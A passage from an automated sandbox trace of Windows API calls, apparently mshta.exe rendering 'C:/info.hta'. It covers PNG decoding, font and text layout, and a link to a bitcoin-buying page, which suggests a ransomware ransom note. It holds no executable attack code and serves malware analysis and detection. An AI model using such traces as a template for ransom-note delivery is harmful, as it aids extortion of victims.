e0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==") returned 0x4d9 [0228.273] CryptStringToBinaryW (in: pszString="iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==", cchString=0x4c8, dwFlags=0x1, pbBinary=0x618738, pcbBinary=0x1ecf14, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x618738, pcbBinary=0x1ecf14, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0228.273] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x6055d8 [0228.273] GetProcessHeap () returned 0x590000 [0228.273] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x394) returned 0x618b18 [0228.274] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x618738 | out: hHeap=0x590000) returned 1 [0228.274] lstrlenW (lpString="") returned 0 [0228.274] lstrlenW (lpString="image/png") returned 9 [0228.274] lstrlenW (lpString="") returned 0 [0228.274] StrCmpNICW (lpStr1="image/pn", lpStr2="text/css", nChar=8) returned -11 [0228.274] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x394) returned 0x618738 [0228.274] lstrlenW (lpString="image/png") returned 9 [0228.274] FindMimeFromData (in: pBC=0x0, pwzUrl=0x0, pBuffer=0x618738, cbSize=0x394, pwzMimeProposed="image/png", dwMimeFlags=0x2, ppwzMimeOut=0x610500, dwReserved=0x0 | out: ppwzMimeOut=0x610500*="image/x-png") returned 0x0 [0228.274] StrCmpICW (pszStr1="image/x-png", pszStr2="text/xml") returned -11 [0228.274] StrCmpNICW (lpStr1="image/x-", lpStr2="text/css", nChar=8) returned -11 [0228.274] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x618738 | out: hHeap=0x590000) returned 1 [0228.274] IUnknown:Release (This=0x5bd424) returned 0x9 [0228.274] IUnknown:Release (This=0x5bd424) returned 0x8 [0228.274] IUnknown:Release (This=0x5bd424) returned 0x7 [0228.274] CoTaskMemFree (pv=0x0) [0228.275] GetCurrentThreadId () returned 0x36c [0228.275] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9c2) returned 0x618eb8 [0228.275] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x606280 [0228.275] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4a8) returned 0x619888 [0228.275] IUnknown:Release (This=0x5bd424) returned 0x6 [0228.275] IUnknown:Release (This=0x5bd424) returned 0x5 [0228.276] IUnknown:AddRef (This=0x5bd424) returned 0x6 [0228.276] IUnknown:Release (This=0x5bd424) returned 0x5 [0228.320] IsCharSpaceW (wch=0x75) returned 0 [0228.320] StrCmpNICW (lpStr1="url", lpStr2="URL", nChar=3) returned 0 [0228.320] IsCharSpaceW (wch=0x28) returned 0 [0228.320] IsCharSpaceW (wch=0x23) returned 0 [0228.320] IsCharSpaceW (wch=0x23) returned 0 [0228.320] IsCharSpaceW (wch=0x64) returned 0 [0228.320] IsCharSpaceW (wch=0x65) returned 0 [0228.320] IsCharSpaceW (wch=0x66) returned 0 [0228.320] IsCharSpaceW (wch=0x61) returned 0 [0228.320] IsCharSpaceW (wch=0x75) returned 0 [0228.320] IsCharSpaceW (wch=0x6c) returned 0 [0228.320] IsCharSpaceW (wch=0x74) returned 0 [0228.320] IsCharSpaceW (wch=0x23) returned 0 [0228.320] IsCharSpaceW (wch=0x41) returned 0 [0228.320] IsCharSpaceW (wch=0x50) returned 0 [0228.320] IsCharSpaceW (wch=0x50) returned 0 [0228.320] IsCharSpaceW (wch=0x4c) returned 0 [0228.320] IsCharSpaceW (wch=0x49) returned 0 [0228.320] IsCharSpaceW (wch=0x43) returned 0 [0228.320] IsCharSpaceW (wch=0x41) returned 0 [0228.320] IsCharSpaceW (wch=0x54) returned 0 [0228.320] IsCharSpaceW (wch=0x49) returned 0 [0228.320] IsCharSpaceW (wch=0x4f) returned 0 [0228.320] IsCharSpaceW (wch=0x4e) returned 0 [0228.320] IsCharSpaceW (wch=0x29) returned 0 [0228.320] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x36) returned 0x5cf9c0 [0228.321] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x606298 [0228.321] IsCharSpaceW (wch=0x0) returned 0 [0228.321] StrCmpICW (pszStr1="#default#APPLICATION", pszStr2="#default#APPLICATION") returned 0 [0228.321] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cf9c0 | out: hHeap=0x590000) returned 1 [0228.321] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x606298 | out: hHeap=0x590000) returned 1 [0228.321] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0228.321] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5fc6e8 [0228.324] LsGetRubyLsimethods () returned 0x0 [0228.325] LsGetTatenakayokoLsimethods () returned 0x0 [0228.325] LsGetHihLsimethods () returned 0x0 [0228.325] LsGetWarichuLsimethods () returned 0x0 [0228.325] LsGetReverseLsimethods () returned 0x0 [0228.325] LsCreateContext () returned 0x0 [0228.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x670) returned 0x61a958 [0228.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x24) returned 0x5f2898 [0228.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x110) returned 0x5e7048 [0228.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x24) returned 0x5f28c8 [0228.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2e4) returned 0x61afd0 [0228.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x605ab0 [0228.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x605cb8 [0228.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xa0) returned 0x61b2c0 [0228.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x40) returned 0x609bc0 [0228.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x605ce0 [0228.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x605d08 [0228.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x605d30 [0228.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x605d58 [0228.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x400) returned 0x61b368 [0228.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8) returned 0x5f9db8 [0228.325] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8) returned 0x5f9dc8 [0228.326] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8) returned 0x5f9dd8 [0228.326] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8) returned 0x5f9de8 [0228.326] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x128) returned 0x61b770 [0228.326] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x11c) returned 0x61b8a0 [0228.326] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x108) returned 0x61b9c8 [0228.326] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x130) returned 0x61bad8 [0228.326] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x110) returned 0x5e7160 [0228.326] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x278) returned 0x61bc10 [0228.326] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xc8) returned 0x61be90 [0228.326] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x190) returned 0x61bf60 [0228.326] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x78) returned 0x5a2200 [0228.326] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xf0) returned 0x61c0f8 [0228.326] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4c) returned 0x5fc6e8 [0228.326] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x194) returned 0x61c1f0 [0228.326] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xc8) returned 0x61c390 [0228.327] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x190) returned 0x61c460 [0228.327] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x108) returned 0x61c5f8 [0228.327] LsSetModWidthPairs () returned 0x0 [0228.327] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x240) returned 0x61c708 [0228.327] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x605618 [0228.327] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x605d80 [0228.327] LsSetBreaking () returned 0x0 [0228.327] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x271) returned 0x61cdc8 [0228.327] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xa) returned 0x606298 [0228.327] LsSetDoc () returned 0x0 [0228.327] LsCreateLine () returned 0x0 [0228.327] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0228.327] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb4) returned 0x61d048 [0228.328] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x605638 [0228.640] LsdnFinishRegular () returned 0x0 [0228.640] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb4) returned 0x60b4c8 [0228.672] GetOutlineTextMetricsW (in: hdc=0x80106e7, cjCopy=0xd8, potm=0x1ee0a8 | out: potm=0x1ee0a8) returned 0xd8 [0228.675] SelectObject (hdc=0x80106e7, h=0x18a002e) returned 0x120a0203 [0228.675] SelectObject (hdc=0x80106e7, h=0x120a0203) returned 0x18a002e [0228.675] GetTextFaceW (in: hdc=0x80106e7, c=32, lpName=0x1ee2f8 | out: lpName="Tahoma") returned 7 [0228.675] SelectObject (hdc=0x80106e7, h=0x18a002e) returned 0x120a0203 [0228.675] SelectObject (hdc=0x80106e7, h=0x120a0203) returned 0x18a002e [0228.675] GetTextCharsetInfo (in: hdc=0x80106e7, lpSig=0x1ee260, dwFlags=0x0 | out: lpSig=0x1ee260) returned 204 [0228.675] SelectObject (hdc=0x80106e7, h=0x18a002e) returned 0x120a0203 [0228.675] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xc) returned 0x606268 [0228.675] SelectObject (hdc=0x80106e7, h=0x120a0203) returned 0x18a002e [0228.675] GetFontUnicodeRanges (in: hdc=0x80106e7, lpgs=0x0 | out: lpgs=0x0) returned 0x208 [0228.675] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0228.675] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x208) returned 0x60f750 [0228.675] GetFontUnicodeRanges (in: hdc=0x80106e7, lpgs=0x60f750 | out: lpgs=0x60f750) returned 0x208 [0228.675] SelectObject (hdc=0x80106e7, h=0x18a002e) returned 0x120a0203 [0228.676] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb4) returned 0x618db8 [0228.676] LsQueryLineDup () returned 0x0 [0228.677] LsDestroyLine () returned 0x0 [0228.677] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x605638 | out: hHeap=0x590000) returned 1 [0228.677] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0228.677] LsSetDoc () returned 0x0 [0228.677] LsCreateLine () returned 0x0 [0228.677] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0228.678] LsQueryLineDup () returned 0x0 [0228.678] LsDestroyLine () returned 0x0 [0228.678] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0228.678] LsSetDoc () returned 0x0 [0228.678] LsCreateLine () returned 0x0 [0228.678] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0228.678] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xf8) returned 0x610588 [0228.678] GetOutlineTextMetricsW (in: hdc=0x80106e7, cjCopy=0xd8, potm=0x1ee0e8 | out: potm=0x1ee0e8) returned 0xd8 [0228.679] SelectObject (hdc=0x80106e7, h=0x18a002e) returned 0x80a0727 [0228.679] SelectObject (hdc=0x80106e7, h=0x80a0727) returned 0x18a002e [0228.679] GetTextFaceW (in: hdc=0x80106e7, c=32, lpName=0x1ee338 | out: lpName="Tahoma") returned 7 [0228.679] SelectObject (hdc=0x80106e7, h=0x18a002e) returned 0x80a0727 [0228.685] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x17c) returned 0x60cdd0 [0228.685] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x61be90, Size=0x12c) returned 0x60bcb8 [0228.685] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x61c390, Size=0x12c) returned 0x60bdf0 [0228.685] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x61bf60, Size=0x258) returned 0x61e118 [0228.685] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x61c460, Size=0x258) returned 0x61be90 [0230.109] SelectObject (hdc=0x80106e7, h=0x18a002e) returned 0x80a0727 [0230.109] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x60bcb8, Size=0x190) returned 0x61f380 [0230.109] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x60bdf0, Size=0x190) returned 0x61f518 [0230.109] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x61e118, Size=0x320) returned 0x61f6b0 [0230.109] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x61be90, Size=0x320) returned 0x61f9d8 [0230.109] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb4) returned 0x61c488 [0230.110] LsQueryLineDup () returned 0x0 [0230.110] LsDestroyLine () returned 0x0 [0230.110] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.110] LsSetDoc () returned 0x0 [0230.110] LsCreateLine () returned 0x0 [0230.110] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.111] LsQueryLineDup () returned 0x0 [0230.111] LsDestroyLine () returned 0x0 [0230.111] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.111] LsSetDoc () returned 0x0 [0230.111] LsCreateLine () returned 0x0 [0230.111] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.113] LsQueryLineDup () returned 0x0 [0230.113] LsDestroyLine () returned 0x0 [0230.113] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.113] LsSetDoc () returned 0x0 [0230.113] LsCreateLine () returned 0x0 [0230.113] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.114] LsQueryLineDup () returned 0x0 [0230.114] LsDestroyLine () returned 0x0 [0230.114] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.114] LsSetDoc () returned 0x0 [0230.114] LsCreateLine () returned 0x0 [0230.114] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.429] GetOutlineTextMetricsW (in: hdc=0x80106e7, cjCopy=0xd8, potm=0x1ee0e8 | out: potm=0x1ee0e8) returned 0xd8 [0230.431] SelectObject (hdc=0x80106e7, h=0x18a002e) returned 0x30a071b [0230.431] SelectObject (hdc=0x80106e7, h=0x30a071b) returned 0x18a002e [0230.431] GetTextFaceW (in: hdc=0x80106e7, c=32, lpName=0x1ee338 | out: lpName="Tahoma") returned 7 [0230.431] SelectObject (hdc=0x80106e7, h=0x18a002e) returned 0x30a071b [0230.432] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a2200, Size=0x140) returned 0x60be08 [0230.432] LsQueryLineDup () returned 0x0 [0230.432] LsDestroyLine () returned 0x0 [0230.432] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.432] LsSetDoc () returned 0x0 [0230.432] LsCreateLine () returned 0x0 [0230.432] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x605638 [0230.433] LsGetRubyLsimethods () returned 0x0 [0230.433] LsGetTatenakayokoLsimethods () returned 0x0 [0230.433] LsGetHihLsimethods () returned 0x0 [0230.433] LsGetWarichuLsimethods () returned 0x0 [0230.433] LsGetReverseLsimethods () returned 0x0 [0230.433] LsCreateContext () returned 0x0 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x670) returned 0x620eb8 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x24) returned 0x5f28f8 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x110) returned 0x5e7278 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x24) returned 0x5f2928 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2e4) returned 0x621530 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x605ec0 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x605ee8 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xa0) returned 0x61c548 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x40) returned 0x609e00 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x605f10 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x605f38 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x605f60 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x605f88 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x400) returned 0x621820 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8) returned 0x5f9df8 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8) returned 0x5f9e08 [0230.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8) returned 0x5f9e18 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8) returned 0x5f9e28 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x128) returned 0x621c28 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x11c) returned 0x621d58 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x108) returned 0x621e80 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x130) returned 0x621f90 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x110) returned 0x5e7390 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x278) returned 0x6220c8 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xc8) returned 0x61be90 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x190) returned 0x622348 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x78) returned 0x5a2200 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xf0) returned 0x612848 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4c) returned 0x5fc740 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x194) returned 0x6224e0 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xc8) returned 0x622680 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x190) returned 0x622750 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x108) returned 0x6228e8 [0230.434] LsSetModWidthPairs () returned 0x0 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x240) returned 0x6229f8 [0230.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x6055d8 [0230.434] LsSetBreaking () returned 0x0 [0230.435] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x271) returned 0x6230b8 [0230.435] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xa) returned 0x606130 [0230.435] LsSetDoc () returned 0x0 [0230.435] LsCreateLine () returned 0x0 [0230.435] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.435] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb4) returned 0x623338 [0230.435] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb4) returned 0x6233f8 [0230.435] LsQueryLineDup () returned 0x0 [0230.435] LsDestroyLine () returned 0x0 [0230.435] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.435] LsdnFinishRegular () returned 0x0 [0230.435] LsQueryLineDup () returned 0x0 [0230.435] LsQueryLineCpPpoint () returned 0x0 [0230.436] LsDestroyLine () returned 0x0 [0230.436] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x605638 | out: hHeap=0x590000) returned 1 [0230.436] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.436] LsSetDoc () returned 0x0 [0230.436] LsCreateLine () returned 0x0 [0230.436] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.436] LsQueryLineDup () returned 0x0 [0230.436] LsDestroyLine () returned 0x0 [0230.436] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.437] LsSetDoc () returned 0x0 [0230.437] LsCreateLine () returned 0x0 [0230.437] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.437] LsQueryLineDup () returned 0x0 [0230.437] LsDestroyLine () returned 0x0 [0230.437] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.437] LsSetDoc () returned 0x0 [0230.437] LsCreateLine () returned 0x0 [0230.437] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.438] LsQueryLineDup () returned 0x0 [0230.438] LsDestroyLine () returned 0x0 [0230.438] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.438] LsSetDoc () returned 0x0 [0230.438] LsCreateLine () returned 0x0 [0230.438] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.438] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x605638 [0230.438] LsSetDoc () returned 0x0 [0230.438] LsCreateLine () returned 0x0 [0230.438] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.439] LsQueryLineDup () returned 0x0 [0230.439] LsDestroyLine () returned 0x0 [0230.439] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.439] LsdnFinishRegular () returned 0x0 [0230.439] LsQueryLineDup () returned 0x0 [0230.439] LsQueryLineCpPpoint () returned 0x0 [0230.439] LsDestroyLine () returned 0x0 [0230.439] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x605638 | out: hHeap=0x590000) returned 1 [0230.439] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.439] LsSetDoc () returned 0x0 [0230.439] LsCreateLine () returned 0x0 [0230.439] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.440] SelectObject (hdc=0x80106e7, h=0x18a002e) returned 0x30a071b [0230.440] LsQueryLineDup () returned 0x0 [0230.440] LsDestroyLine () returned 0x0 [0230.440] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0230.440] CreateUri (in: pwzURI="https://localbitcoins.com/buy_bitcoins", dwFlags=0x2b81, dwReserved=0x0, ppURI=0x1ee60c | out: ppURI=0x1ee60c*=0x5bd5d4) returned 0x0 [0230.603] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1ee520 | out: ppu=0x1ee520) returned 0x0 [0230.603] CreateUri (in: pwzURI="file:///C:/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x1ee5dc | out: ppURI=0x1ee5dc*=0x5bbf0c) returned 0x0 [0230.603] IUnknown:QueryInterface (in: This=0x5bbf0c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ee5a4 | out: ppvObject=0x1ee5a4*=0x5bbf0c) returned 0x0 [0230.603] IUnknown:Release (This=0x5bbf0c) returned 0xd [0230.603] IUnknown:AddRef (This=0x5bbf0c) returned 0xe [0230.603] CoInternetCombineIUri (in: pBaseUri=0x5bbf0c, pRelativeUri=0x5bd5d4, dwCombineFlags=0x6000000, ppCombinedUri=0x1ee610, dwReserved=0x0 | out: ppCombinedUri=0x1ee610*=0x5bd5d4) returned 0x0 [0230.603] IUnknown:Release (This=0x5bbf0c) returned 